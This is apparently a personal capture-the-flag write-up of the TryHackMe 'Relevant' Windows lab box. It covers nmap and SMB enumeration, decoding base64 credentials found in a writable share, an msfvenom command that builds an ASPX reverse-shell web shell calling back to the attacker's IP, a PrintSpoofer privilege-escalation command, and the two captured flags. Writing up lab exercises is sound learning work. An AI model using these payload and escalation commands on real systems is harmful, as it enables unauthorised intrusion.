# Relevant ###### tags: `vulnerableMachine` # Scope of work - black box penetration test - The client has asked that you secure two flags (no location provided) as proof of exploitation: - User.txt - Root.txt --- - Any tools or techniques are permitted in this engagement - Locate and note all vulnerabilities found - Find and report ALL vulnerabilities (yes, there is more than one path to root) Require format - executive summary - vulnerability - exploitation assessment - remediation suggestions # Recon ``` python3 ../../deepScan.py 10.10.221.83 script is running. Author:meowhecker Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 11:59 CST Nmap scan report for 10.10.221.83 Host is up (0.28s latency). Not shown: 65527 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: IIS Windows Server 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2023-02-13T04:06:50+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=Relevant | Not valid before: 2023-02-12T03:35:08 |_Not valid after: 2023-08-14T03:35:08 | rdp-ntlm-info: | Target_Name: RELEVANT | NetBIOS_Domain_Name: RELEVANT | NetBIOS_Computer_Name: RELEVANT | DNS_Domain_Name: Relevant | DNS_Computer_Name: Relevant | Product_Version: 10.0.14393 |_ System_Time: 2023-02-13T04:06:12+00:00 49663/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server | http-methods: |_ Potentially risky methods: TRACE 49667/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%) OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607 Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 5 hops Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 1h36m00s, deviation: 3h34m41s, median: 0s | smb2-security-mode: | 311: |_ Message signing enabled but not required | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2023-02-13T04:06:15 |_ start_date: 2023-02-13T03:35:10 | smb-os-discovery: | OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3) | Computer name: Relevant | NetBIOS computer name: RELEVANT\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2023-02-12T20:06:13-08:00 TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 172.27 ms 10.17.0.1 2 ... 4 5 284.40 ms 10.10.221.83 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 451.86 seconds ``` potential vulnerable service 80 web 445 SMB server 49663 IIS Windows Server -> probably testing server brute the file folder --- ``` nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.43.201 ``` ``` Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 14:10 CST Nmap scan report for 10.10.43.201 Host is up (0.36s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-enum-shares: | account_used: guest | \\10.10.43.201\ADMIN$: | Type: STYPE_DISKTREE_HIDDEN | Comment: Remote Admin | Anonymous access: <none> | Current user access: <none> | \\10.10.43.201\C$: | Type: STYPE_DISKTREE_HIDDEN | Comment: Default share | Anonymous access: <none> | Current user access: <none> | \\10.10.43.201\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: Remote IPC | Anonymous access: <none> | Current user access: READ/WRITE | \\10.10.43.201\nt4wrksv: | Type: STYPE_DISKTREE | Comment: | Anonymous access: <none> |_ Current user access: READ/WRITE Nmap done: 1 IP address (1 host up) scanned in 136.63 seconds ``` SMB login ``` smbclient //10.10.43.201/nt4wrksv ``` We could discover the SMB server have sensitive data -> password.txt ``` get passwords.txt ``` ``` [User Passwords - Encoded] Qm9iIC0gIVBAJCRXMHJEITEyMw== QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk ``` Qm9iIC0gIVBAJCRXMHJEITEyMw== (Base64 Encode) Decoded https://www.asciitohex.com/ ``` Bob - !P@$$W0rD!123 Bill - Juw4nnaM4n420696969!$$$ ``` ``` ==> DIRECTORY: http://10.10.43.201:49663/aspnet_client/ --> Testing: http://10.10.43.201:49663/captcha --> Testing: http://10.10.43.201:49663/carbuyaction http://10.10.43.201:49663/aspnet_client/ ``` ## Initial Access   We can infer that the SMB directory is associated with the 49663 server, and that the directory actually exists. Now, we could attempt to upload the web shell in order to gain initiall access. http://10.10.43.201:49663/aspnet_client/ Based on URL path, we can infer that web application likely an ASP web server ASP webShell ``` msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.17.11.72 LPORT=443 -f aspx -o webShell.aspx ```  To trigger the web shell using the web browser.  ## Privilege Escalation ---  It appears the current user has the SeImpersonatePrivilege token enabled, which means token impersonation could be used to escalate privileges. Upload execute file https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0   Executing the exploit ``` PrintSpoofer64.exe -i -c cmd ```  ``` powershell.exe ``` THM{fdk4ka34vk346ksxfr21tg789ktf45}  ---  THM{1fk5kf469devly1gl320zafgl345pv}